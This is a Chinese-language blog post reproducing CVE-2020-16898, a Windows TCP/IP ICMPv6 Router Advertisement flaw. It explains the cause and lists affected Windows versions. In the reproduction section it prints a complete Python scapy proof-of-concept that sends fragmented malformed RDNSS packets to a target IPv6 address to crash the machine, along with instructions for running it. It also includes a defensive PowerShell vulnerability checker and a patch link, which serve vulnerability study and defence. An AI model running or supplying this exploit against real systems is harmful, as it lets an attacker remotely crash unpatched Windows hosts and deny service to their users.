Windows tcp/ip（CVE-2020-16898）远程代码执行蓝屏漏洞复现

谁践踏了优雅 2024-04-07 10:49 64阅读 0赞

#### 0x00 漏洞背景 ####

2020年10月14日，某监测发现 Microsoft 发布了 TCP/IP远程代码执行漏洞的风险通告，该漏洞是由于Windows TCP/IP堆栈在处理IMCPv6 Router Advertisement(路由通告)数据包时存在漏洞，远程攻击者通过构造特制的ICMPv6 Router Advertisement(路由通告)数据包 ，并将其发送到远程Windows主机上，可造成远程BSOD，漏洞编号为CVE-2020-16898。

#### 0x01 影响版本 ####

<table> 
 <thead> 
  <tr> 
   <th align="left">操作系统</th> 
   <th align="left">版本</th> 
   <th>版本补丁</th> 
   <th>经过测试</th> 
  </tr> 
 </thead> 
 <tbody> 
  <tr> 
   <td align="left">Windows 10</td> 
   <td align="left">X86 / x64 / ARM64</td> 
   <td>1709</td> 
   <td>✔️</td> 
  </tr> 
  <tr> 
   <td align="left">Windows 10</td> 
   <td align="left">X86 / x64 / ARM64</td> 
   <td>1803</td> 
   <td>✔️</td> 
  </tr> 
  <tr> 
   <td align="left">Windows 10</td> 
   <td align="left">X86 / x64 / ARM64</td> 
   <td>1809年</td> 
   <td>✔️</td> 
  </tr> 
  <tr> 
   <td align="left">Windows 10</td> 
   <td align="left">X86 / x64 / ARM64</td> 
   <td>1903年</td> 
   <td>✔️</td> 
  </tr> 
  <tr> 
   <td align="left">Windows 10</td> 
   <td align="left">X86 / x64 / ARM64</td> 
   <td>1909年</td> 
   <td>✔️</td> 
  </tr> 
  <tr> 
   <td align="left">Windows 10</td> 
   <td align="left">X86 / x64 / ARM64</td> 
   <td>2004年</td> 
   <td>✔️</td> 
  </tr> 
  <tr> 
   <td align="left">Windows Server 2019</td> 
   <td align="left">&nbsp;</td> 
   <td>&nbsp;</td> 
   <td>&nbsp;</td> 
  </tr> 
  <tr> 
   <td align="left">Windows Server 2019(服务器核心版)</td> 
   <td align="left">&nbsp;</td> 
   <td>&nbsp;</td> 
   <td>&nbsp;</td> 
  </tr> 
  <tr> 
   <td align="left">Windows Server 1903版(服务器核心版)</td> 
   <td align="left">&nbsp;</td> 
   <td>&nbsp;</td> 
   <td>&nbsp;</td> 
  </tr> 
  <tr> 
   <td align="left">Windows Server版本1909(服务器核心版)</td> 
   <td align="left">&nbsp;</td> 
   <td>&nbsp;</td> 
   <td>&nbsp;</td> 
  </tr> 
  <tr> 
   <td align="left">Windows Server 2004版(服务器核心版本)</td> 
   <td align="left">&nbsp;</td> 
   <td>&nbsp;</td> 
   <td>&nbsp;</td> 
  </tr> 
 </tbody> 
</table>

#####  #####

#### 0x02 漏洞成因 ####

根据rfc5006 描述，RDNSS包的length应为奇数，而当攻击者构造的RDNSS包的Length为偶数时，Windows TCP/IP 在检查包过程中会根据Length来获取每个包的偏移，遍历解析，导致对 Addresses of IPv6 Recursive DNS Servers 和下一个 RDNSS 选项的边界解析错误，从而绕过验证，将攻击者伪造的option包进行解析，造成栈溢出，从而导致系统崩溃。

#### 0x03 漏洞复现 ####

攻击机：win10x64

靶机：Windows 10x64\_1709

1.通过vmware对受害主机开启IPV6

![e6779bd60503b5f43f8bcd77ee9c8229.png][]

![0fb6f7fd873d577cea890fc39c7ccfba.png][]

2.对CVE-2020-16898.py脚本中的IPV6地址进行修改，这里分别为攻击机的本来连接IPV6地址以及靶机IPV6地址。

![a87536b439a23ae2d110f25ef275a1b1.png][]

![791162a9906f2b16c23f7a42bdf49ec2.png][]

#!/usr/bin/env python3
    #
    # Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
    #
    # Author: Adam 'pi3' Zabrocki
    # http://pi3.com.pl
    
    
    from scapy.all import *
    from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6
     
    v6_dst = "fd15:4ba5:5a2b:1008:9d37:36d2:3363:6496"   #目标靶机IPv6 地址
    v6_src = "fe80::ec1e:a7aa:6717:67c6%13"              #攻击机本地链接 IPv6 地址
     
    p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
    p_test = p_test_half + 'A'.encode()*4
     
    c = ICMPv6NDOptEFA()
     
    e = ICMPv6NDOptRDNSS()
    e.len = 21
    e.dns = [
    "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
    aaa = ICMPv6NDOptRDNSS()
    aaa.len = 8
    pkt = ICMPv6ND_RA() / aaa / \
          Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
     
    p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
                  IPv6ExtHdrFragment()/pkt
     
    l=fragment6(p_test_frag, 200)
     
    for p in l:
        send(p)

3.最后使用命令pip3 install scapy，安装依赖包,执行CVE-2020-16898.py，即可看到靶机出现蓝屏

![e029314ab60c9a503f25377f21b52702.png][]

![beaf18f7e308424bbbd57f1cfa7fff61.png][]

4.本地检查脚本：CVE-2020-16898\_Checker.ps1

#######################################################################################################
    ### 14/10/2020 - Written by Cyril Pineiro / SYNAPSYS-IT
    ### Check if Network Interface is Vulnerable to CVE-2020-16898 & CVE-2020-16899
    ### Returns Interface Index and Alias
    #######################################################################################################
    
    Clear
    
    $interfaces = (Get-NetIPInterface | where {$_.AddressFamily -eq "IPv6"}).ifIndex
    foreach ($interface in $interfaces)
    {
        [bool]$vuln = $false
        $output = netsh int ipv6 sh interfaces interface=$interface
        foreach ($Line in $output)
        {
            if($Line.Contains("6106") -and $Line.Contains("enabled"))
            {
                [bool]$vuln = $true
            }
        }
        $NetIPInterfaceAlias = ((Get-NetIPAddress -InterfaceIndex $interface | Select-Object InterfaceAlias)[0]).InterfaceAlias
        if ($vuln)
        {
            Write-Host "Interface '$($interface)' named '$($NetIPInterfaceAlias)' is Vulnerable to CVE-2020-16898 & CVE-2020-16899" -ForegroundColor Red
        }
        else
        {
            Write-Host "Interface '$($interface)' named '$($NetIPInterfaceAlias)' is Not Vulnerable to CVE-2020-16898 & CVE-2020-16899" -ForegroundColor Green
        }
    }

![d0f61baf34562e645240768dd9a1fedf.png][]

#### 0x04 漏洞修复 ####

通过如下链接自行寻找符合操作系统版本的漏洞补丁，并进行补丁下载安装

[https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898][https_portal.msrc.microsoft.com_en-US_security-guidance_advisory_CVE-2020-16898]

#### 0x05 参考地址 ####

[https://github.com/momika233/CVE-2020-16898-exp/blob/main/CVE-2020-16898.py][https_github.com_momika233_CVE-2020-16898-exp_blob_main_CVE-2020-16898.py]

[https://github.com/CPO-EH/CVE-2020-16898\_Checker/blob/main/CVE-2020-16898\_Checker.ps1][https_github.com_CPO-EH_CVE-2020-16898_Checker_blob_main_CVE-2020-16898_Checker.ps1]

[https://github.com/Ascotbe/Kernelhub/tree/master/CVE-2020-16898][https_github.com_Ascotbe_Kernelhub_tree_master_CVE-2020-16898]

[e6779bd60503b5f43f8bcd77ee9c8229.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/6318c30864744a1287900fae72ea76fc.png
[0fb6f7fd873d577cea890fc39c7ccfba.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/777bcd6fff31448fa1a06459dc668394.png
[a87536b439a23ae2d110f25ef275a1b1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/b9223eeb6b084d69b23ae02caba8b849.png
[791162a9906f2b16c23f7a42bdf49ec2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/9e87de1720064f4095a7e608f623c2ae.png
[e029314ab60c9a503f25377f21b52702.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/57f8085f97424326bc6a79883330efc6.png
[beaf18f7e308424bbbd57f1cfa7fff61.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/621ccdd81f18403bb596019f892852bd.png
[d0f61baf34562e645240768dd9a1fedf.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/7c96fd4a749f4ab4802129ad1c985d81.png
[https_portal.msrc.microsoft.com_en-US_security-guidance_advisory_CVE-2020-16898]: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898
[https_github.com_momika233_CVE-2020-16898-exp_blob_main_CVE-2020-16898.py]: https://github.com/momika233/CVE-2020-16898-exp/blob/main/CVE-2020-16898.py
[https_github.com_CPO-EH_CVE-2020-16898_Checker_blob_main_CVE-2020-16898_Checker.ps1]: https://github.com/CPO-EH/CVE-2020-16898_Checker/blob/main/CVE-2020-16898_Checker.ps1
[https_github.com_Ascotbe_Kernelhub_tree_master_CVE-2020-16898]: https://github.com/Ascotbe/Kernelhub/tree/master/CVE-2020-16898